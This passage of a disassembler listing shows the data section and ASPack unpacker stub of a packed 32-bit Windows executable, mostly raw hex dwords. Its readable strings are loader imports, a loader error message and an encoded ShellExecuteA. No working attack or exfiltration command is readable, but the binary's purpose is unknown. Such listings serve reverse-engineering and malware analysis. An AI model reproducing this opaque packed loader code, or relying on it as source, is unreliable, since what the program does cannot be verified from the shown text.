dd 20202000h, 20202020h, 20h
dword_4075E4 dd 4E4h ; DATA XREF: sub_402B52+10�w
; sub_402B7B+16�r ...
align 10h
dword_4075F0 dd 4 dup(0) ; DATA XREF: sub_402B52+1F�o
; sub_402D07+162�o ...
byte_407600 db 0 ; DATA XREF: sub_402B7B:loc_402C8D�w
; sub_402B7B:loc_402CAA�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_407700 dd 370000h ; DATA XREF: sub_4022BE+19�w
; sub_4022BE+3E�r ...
dword_407704 dd 1 ; DATA XREF: sub_4022BE+28�w
; sub_402F0B+9�r ...
dword_407708 dd 20h ; DATA XREF: sub_402071+1F�w
; sub_402071:loc_4020FA�r ...
dd 5 dup(0)
dword_407720 dd 370650h ; DATA XREF: sub_402071:loc_40208B�w
; sub_402071+3C�r ...
dword_407724 dd 3Fh dup(0) ; DATA XREF: sub_402071+91�o
dword_407820 dd 1 ; DATA XREF: sub_401C7A+9F�w
dword_407824 dd 370754h ; DATA XREF: sub_4017FB+3E�r
; sub_4017FB:loc_40184D�r ...
dword_407828 dd 370758h ; DATA XREF: sub_4017FB+34�r
; sub_4017FB+5A�r ...
dword_40782C dd 1 ; DATA XREF: sub_401C1D+4�r
; sub_401C7A+3�r ...
dword_407830 dd 0 ; DATA XREF: sub_401761:loc_401791�r
dword_407834 dd 142340h ; DATA XREF: .text:00401393�w
; sub_401C1D:loc_401C2E�r ...
align 800h
_data ends
; Section 5. (virtual address 0002C000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0002C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_aspack segment para public 'DATA' use32
assume cs:_aspack
;org 42C000h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
pusha
call near ptr loc_42C007+3
loc_42C007: ; CODE XREF: start+1�p
jmp near ptr 459FC4F7h
start endp
; ---------------------------------------------------------------------------
dd 1E8C355h, 0EB000000h, 0FFEDBB5Dh, 0DD03FFFFh, 0C000EB81h
dd 0BD830002h, 422h, 229D8900h, 0F000004h, 36585h, 2E858D00h
dd 50000004h, 0F4D95FFh, 85890000h, 426h, 5D8DF88Bh, 0FF50535Eh
dd 0F4995h, 4D858900h, 8D000005h, 57536B5Dh, 0F4995FFh
dd 85890000h, 551h, 0FF77458Dh, 726956E0h, 6C617574h, 6F6C6C41h
dd 69560063h, 61757472h, 6572466Ch, 9D8B0065h, 531h, 0A74DB0Bh
dd 8587038Bh, 535h, 0B58D0389h, 569h, 0F003E83h, 12184h
dd 68046A00h, 1000h, 180068h, 0FF006A00h, 54D95h, 56858900h
dd 8B000001h, 0E050446h, 6A000001h, 10006804h, 6A500000h
dd 4D95FF00h, 89000005h, 15285h, 1E8B5600h, 4229D03h, 0B5FF0000h
dd 156h, 500476FFh, 56EE853h, 1B30000h, 7500FB80h, 0EC85FE5Eh
dd 8B000000h, 22BD033Eh, 0FF000004h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 52B58B06h, 33000001h, 74C90BDBh
dd 0AC2C782Eh, 0A74E83Ch, 0E93C00EBh, 49430474h, 68BEBEBh
dd 3E8000EBh, 24F37503h, 18C0C100h, 689C32Bh, 8305C383h
dd 0E98304C6h, 5BCEEB05h, 0EB58595Eh, 39000008h, 37000000h
dd 8BC88B00h, 22BD033Eh, 8B000004h, 152B5h, 2F9C100h, 0C88BA5F3h
dd 0F303E183h, 685EA4h, 6A000080h, 52B5FF00h, 0FF000001h
dd 55195h, 8C68300h, 0F003E83h, 0FFFF1E85h, 800068FFh
dd 6A0000h, 156B5FFh, 95FF0000h, 551h, 5319D8Bh, 0DB0B0000h
dd 38B0874h, 5358587h, 958B0000h, 422h, 52D858Bh, 0D02B0000h
dd 0C28B7974h, 3310E8C1h, 39B58BDBh, 3000005h, 422B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 422BD03h, 0C6830000h
dd 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h, 3FB8316h
dd 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 42295h, 41B58B00h, 0B000005h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 5DF8BEh, 22958B00h
dd 3000004h, 0C468BF2h, 840FC085h, 10Ah, 0D88BC203h, 4D95FF50h
dd 8500000Fh, 530775C0h, 0F5195FFh, 85890000h, 545h, 54985C7h
dd 0
dd 958B0000h, 422h, 0C085068Bh, 468B0375h, 3C20310h, 54985h
dd 8B188B00h, 0FA03107Eh, 549BD03h, 0DB850000h, 0A2840Fh
dd 0C3F70000h, 80000000h, 0DA030475h, 81534343h, 0FFFFFFE3h
dd 0B5FF537Fh, 545h, 0F4995FFh, 0C0850000h, 0F76F755Bh
dd 0C3h, 57197580h, 30C468Bh, 42285h, 8D535000h, 47585h
dd 0E9575000h, 98h, 0FFFFE381h, 858B7FFFh, 426h, 5458539h
dd 24750000h, 4AD38B57h, 8B02E2C1h, 5459Dh, 3C7B8B00h
dd 783B7C8Bh, 1C3B5C03h, 313048Bh, 54585h, 16EB5F00h, 0C468B57h
dd 4228503h, 53500000h, 4C6858Dh, 57500000h, 7894AEBh
dd 5498583h, 0E9040000h, 0FFFFFF32h, 46890689h, 1046890Ch
dd 8B14C683h, 42295h, 0FEEBE900h, 81B8FFFFh, 50000012h
dd 4228503h, 0B590000h, 0A88589C9h, 61000003h, 1B80875h
dd 0C2000000h, 8168000Ch, 0C3004012h, 426858Bh, 8D8D0000h
dd 43Bh, 95FF5051h, 0F49h, 5558589h, 858D0000h, 447h, 5195FF50h
dd 8900000Fh, 42A85h, 528D8D00h, 51000004h, 4995FF50h
dd 8900000Fh, 55985h, 2A858B00h, 8D000004h, 45E8Dh, 0FF505100h
dd 0F4995h, 83D0FF00h, 6A5F10C4h, 689D8D30h, 53000004h
dd 0FF006A57h, 55995h, 0FFFF6A00h, 55595h, 40000000h, 0E6000000h
dd 77h, 72656B00h, 336C656Eh, 6C642E32h, 7845006Ch, 72507469h
dd 7365636Fh, 73750073h, 32337265h, 6C6C642Eh, 73654D00h
dd 65676173h, 41786F42h, 70737700h, 746E6972h, 4C004166h
dd 4544414Fh, 52452052h, 524F52h, 20656854h, 636F7270h
dd 72756465h, 6E652065h, 20797274h, 6E696F70h, 73252074h
dd 756F6320h, 6E20646Ch, 6220746Fh, 6F6C2065h, 65746163h
dd 6E692064h, 65687420h, 6E796420h, 63696D61h, 6E696C20h
dd 696C206Bh, 72617262h, 73252079h, 65685400h, 64726F20h
dd 6C616E69h, 20752520h, 6C756F63h, 6F6E2064h, 65622074h
dd 636F6C20h, 64657461h, 206E6920h, 20656874h, 616E7964h
dd 2063696Dh, 6B6E696Ch, 62696C20h, 79726172h, 732520h
dd 248EBA52h, 0AAC9C3Bh, 321474C0h, 0D108B0D0h, 810673EAh
dd 0A7F39AF2h, 75C8FEC1h, 92E7EBF2h, 0DB87C35Ah, 400000h
dd 5 dup(0)
dd 773D0000h, 4, 77E7980Ah, 77E79E34h, 5 dup(0)
dd 1000h, 4000h, 5000h, 2000h, 7000h, 1000h, 80F0h, 23F10h
dd 34h dup(0)
dd 1024448Bh, 354EC81h, 4C8D0000h, 0E8500424h, 3A8h, 5C248C8Bh
dd 8B000003h, 3582494h, 52510000h, 0C244C8Dh, 40DE8h, 75C08400h
dd 0FFC8830Ah, 354C481h, 8BC30000h, 360248Ch, 48D0000h
dd 8D515024h, 0E80C244Ch, 5E8h, 0A75C084h, 81FFC883h, 354C4h
dd 48BC300h, 54C48124h, 0C2000003h, 1000010h, 5040302h
dd 0A080706h, 14100E0Ch, 28201C18h, 50403830h, 0A0807060h
dd 0E0C0h, 0
dd 1010000h, 2020101h, 3030202h, 4040303h, 5050404h, 505h
dd 1010000h, 3030202h, 5050404h, 7070606h, 9090808h, 0B0B0A0Ah
dd 0D0D0C0Ch, 0F0F0E0Eh, 11111010h, 3 dup(11111111h), 2 dup(12121212h)
dd 56D18B51h, 8B9h, 4A395700h, 53357204h, 0FFFFF8BEh, 8A028BFFh
dd 5C884018h, 2890C24h, 8B08428Bh, 0C10C247Ch, 0E78108E0h
dd 0FFh, 7A8BC70Bh, 89FE0304h, 0C78B0842h, 3B047A89h, 5BD273C1h
dd 8B04728Bh, 7C8B0842h, 0CE2B1024h, 18B9E8D3h, 2B000000h
dd 0FFFF25CFh, 0E8D300FFh, 895FF703h, 595E0472h, 8B0004C2h
dd 8B042444h, 89082454h, 8481h, 88918900h, 8D000000h, 81898204h
dd 8Ch, 10005h, 8C200h, 98EC81h, 55530000h, 57D18B56h
dd 0FB9h, 84AA8B00h, 33000000h, 247C8DC0h, 0F3F6332Ch
dd 24BC8BABh, 0ACh, 5489EE3Bh, 15762024h, 0C8AC933h, 8C5C8B38h
dd 8C4C8D28h, 3B404328h, 721989C5h, 17B9EBh, 74890000h
dd 72892824h, 44728904h, 68247489h, 7489FF33h, 44C71C24h
dd 11024h, 4C890000h, 6A8D1824h, 24748908h, 34448B14h
dd 3E0D32Ch, 0FF81F8h, 89010000h, 0F24247Ch, 8E87h, 34448B00h
dd 7D8928h, 33C5D8Bh, 10F983C3h, 89404589h, 7C6C3444h
dd 758B4Dh, 1024448Bh, 1C245C8Bh, 8CBA8Bh, 0EEC10000h
dd 25CE8B10h, 0FFh, 0FB03CB2Bh, 0D18BD88Ah, 7489FB8Ah
dd 0C38B1C24h, 1424748Bh, 6610E0C1h, 0E9C1C38Bh, 8BABF302h
dd 24548BCAh, 3E18320h, 7C8BAAF3h, 4C8B2424h, 448B1824h
dd 0C6831024h, 83494004h, 0F98304C5h, 24448909h, 244C8910h
dd 24748918h, 628D0F14h, 81FFFFFFh, 0FFh, 5F0F7401h, 0C0325D5Eh
dd 98C4815Bh, 0C2000000h, 828B0004h, 84h, 0C085C933h, 0B48B3B76h
dd 0AC24h, 31048A00h, 2274C084h, 88BA8Bh, 0FF250000h, 8B000000h
dd 89688444h, 0C033870Ch, 8B31048Ah, 8D68847Ch, 47688444h
dd 828B3889h, 84h, 72C83B41h, 5D5E5FCCh, 815B01B0h, 98C4h
dd 4C200h, 8B565351h, 68B57F1h, 8047883h, 88B3072h, 8841118Ah
dd 890C2454h, 8488B08h, 0C24548Bh, 8108E1C1h, 0FFE2h, 8BCA0B00h
dd 0C2830450h, 84889F8h, 5089CA8Bh, 8F98304h, 508BD073h
dd 8408B04h, 8B9h, 0D3CA2B00h, 244E8BE8h, 0FFFE0025h, 73C13B00h
dd 8C968B14h, 8B000000h, 10E9C1C8h, 1C8ADB33h, 0EBD38B11h
dd 2C463B3Bh, 463B0A73h, 83D21B28h, 2CEB0AC2h, 7330463Bh
dd 0BBA07h, 20EB0000h, 7334463Bh, 0CBA07h, 14EB0000h, 7338463Bh
dd 0DBA07h, 8EB0000h, 1B3C463Bh, 0FC283D2h, 798B0E8Bh
dd 89FA0304h, 1C8B0479h, 18B996h, 0C32B0000h, 0D35FCA2Bh
dd 964C8BE8h, 8BC10344h, 888Eh, 8B5B5E00h, 0C3598104h
dd 8B575653h, 33D233F9h, 68B78DC0h, 89000002h, 57E85616h
dd 8A000002h, 403A308Ch, 0BB5E0044h, 1, 0D304C683h, 40D303E3h
dd 723AF883h, 24448BDEh, 104F8D10h, 2D16850h, 48E80000h
dd 50FFFFFDh, 8F8D1C6Ah, 0A0h, 0FFFD3AE8h, 86A50FFh, 1308F8Dh
dd 2CE80000h, 50FFFFFDh, 8F8D136Ah, 1C0h, 0FFFD1EE8h, 608789FFh
dd 5F000002h, 2F5055Eh, 0C25B0000h, 448B0004h, 0D18B0824h
dd 4244C8Bh, 8D028957h, 8890442h, 200440C7h, 89000000h
dd 82891042h, 0A0h, 1308289h, 82890000h, 1C0h, 0BDB9C033h
dd 89000000h, 25082h, 54828900h, 89000002h, 25882h, 60BA8B00h
dd 89000002h, 25C82h, 8BABF300h, 4E8AACAh, 5F000000h, 810008C2h
dd 30CECh, 0D98B5300h, 6B8D5655h, 16A5704h, 29E8CD8Bh
dd 85FFFFFCh, 8B0E75C0h, 260BBh, 0BDB900h, 0ABF30000h
dd 6AF633AAh, 0E8CD8B04h, 0FFFFFC0Ch, 10344488h, 13FE8346h
dd 0BB8DED72h, 1C0h, 1024448Dh, 0E8CF8B50h, 0FFFFFC80h
dd 0B75C084h, 5B5D5E5Fh, 30CC481h, 33C30000h, 0E8CF8BF6h
dd 0FFFFFDE4h, 7310F883h, 608B8B15h, 8A000002h, 0D0023114h
dd 880FE280h, 46243454h, 287560EBh, 0CD8B026Ah, 0FFFBB3E8h
dd 3C083FFh, 4E7EC085h, 2F5FE81h, 527D0000h, 23344C8Ah
dd 344C8848h, 0C0854624h, 36EBEA7Fh, 7511F883h, 8B036A0Eh
dd 0FB86E8CDh, 0C083FFFFh, 6A0CEB03h, 0E8CD8B07h, 0FFFFFB78h
dd 850BC083h, 81137EC0h, 2F5FEh, 0C6177D00h, 243444h, 0C0854846h
dd 0FE81ED7Fh, 2F5h, 0FF738C0Fh, 548DFFFFh, 4B8D2424h
dd 0D5E85210h, 84FFFFFBh, 5F0B75C0h, 815B5D5Eh, 30CC4h
dd 848DC300h, 2F524h, 0A08B8D00h, 50000000h, 0FFFBB3E8h
dd 75C084FFh, 5D5E5F0Bh, 0CC4815Bh, 0C3000003h, 11248C8Dh
dd 51000003h, 1308B8Dh, 91E80000h, 84FFFFFBh, 5F0B75C0h
dd 815B5D5Eh, 30CC4h, 83C6C300h, 264h, 80C03300h, 31104BCh
dd 75030000h, 0F8834008h, 0EBF07208h, 6483C607h, 1000002h
dd 260BB8Bh, 748D0000h, 0F5B92424h, 0F3000002h, 5D5E5FA4h
dd 815B01B0h, 30CC4h, 1E8C300h, 90000000h, 0C7EE815Eh
dd 0C3004445h, 8B14EC83h, 531C2444h, 0C75655h, 0
dd 2424448Bh, 85FF3357h, 89F18BC0h, 0F10247Ch, 25B86h
dd 104E8D00h, 0FFFC83E8h, 1003DFFh, 13730000h, 1880E8Bh
dd 47410E8Bh, 7C890E89h, 29E91024h, 3D000002h, 2D0h, 213830Fh
dd 50000h, 8BFFFFFFh, 7E083E8h, 8D03EDC1h, 0F8830250h
dd 24548907h, 94850F14h, 8D000000h, 0A08Eh, 0FC36E800h
dd 4E8BFFFFh, 56DB3308h, 0FFFF6DE8h, 309C8AFFh, 44401Eh
dd 8F9835Eh, 4E8B3272h, 41118A04h, 18245488h, 8B044E89h
dd 548B0C4Eh, 0E1C11824h, 0FFE28108h, 0B000000h, 8568BCAh
dd 89F8C283h, 0CA8B0C4Eh, 83085689h, 0CE7308F9h, 8B087E8Bh
dd 8B90C56h, 2B000000h, 0D3FB03CFh, 18B9EAh, 7E890000h
dd 81CB2B08h, 0FFFFFFE2h, 33EAD300h, 3E856C9h, 8AFFFFFFh
dd 4002308Ch, 8B5E0044h, 3142444h, 89C103CAh, 8A142444h
dd 26486h, 0AE9C8B00h, 268h, 0E856D233h, 0FFFFFEDAh, 3A35948Ah
dd 5E004440h, 0FA8BC084h, 0FF837674h, 8B717203h, 6F8D0846h
dd 8F883FDh, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B1C24h, 4468908h, 1C24448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 7E8B0846h
dd 8B90Ch, 0C82B0000h, 0EFD3C503h, 18B9h, 8468900h, 0E781CD2Bh
dd 0FFFFFFh, 8E8DEFD3h, 130h, 0FFFB1BE8h, 8DC303FFh, 5BEBF81Ch
dd 8087E83h, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B2024h, 4468908h, 2024448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 468B0856h
dd 8B90Ch, 0CA2B0000h, 0E8D3D703h, 18B9h, 8568900h, 0FF25CF2Bh
dd 0D300FFFFh, 83D803E8h, 1A7303FBh, 509E8C8Bh, 85000002h
dd 8B3074DBh, 25096h, 9E948900h, 250h, 868B1BEBh, 254h
dd 250968Bh, 4B8D0000h, 588689FDh, 89000002h, 25496h, 508E8900h
dd 8B000002h, 247C8B06h, 148D4114h, 89C23B38h, 8B107316h
dd 40D12BD0h, 5088128Ah, 3B168BFFh, 8BF072C2h, 3102444h
dd 244489C7h, 0EBF88B10h, 0E8CE8B0Bh, 0FFFFFBF7h, 1C74C084h
dd 28247C3Bh, 0FDAB820Fh, 448BFFFFh, 38892C24h, 0B05D5E5Fh
dd 0C4835B01h, 8C214h, 325D5E5Fh, 0C4835BC0h, 8C214h, 7 dup(0)
dd 8, 77E7A5FDh, 77E79F93h, 77E805D8h, 0
aKernel32_dll_0 db 'kernel32.dll',0
db 2 dup(0), 47h
aEtprocaddress db 'etProcAddress',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
db 2 dup(0), 4Ch
aOadlibrarya db 'oadLibraryA',0
dd 3 dup(0)
dd 2CF6Ch, 2CF5Ch, 3 dup(0)
dd 2CFE8h, 2CFF4h, 5 dup(0)
aShell32_dll_0 db 'shell32.dll',0
aClbw db '—‹Bw',0
align 4
dd 68530000h, 456C6C65h, 75636578h, 416574h, 3FDh dup(0)
_aspack ends
; Section 6. (virtual address 0002E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0002E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_adata segment para public 'DATA' use32
assume cs:_adata
;org 42E000h
dd 400h dup(0)
_adata ends
; Section 7. (virtual address 0002F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0002F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 42F000h
align 2000h
_idata2 ends
end start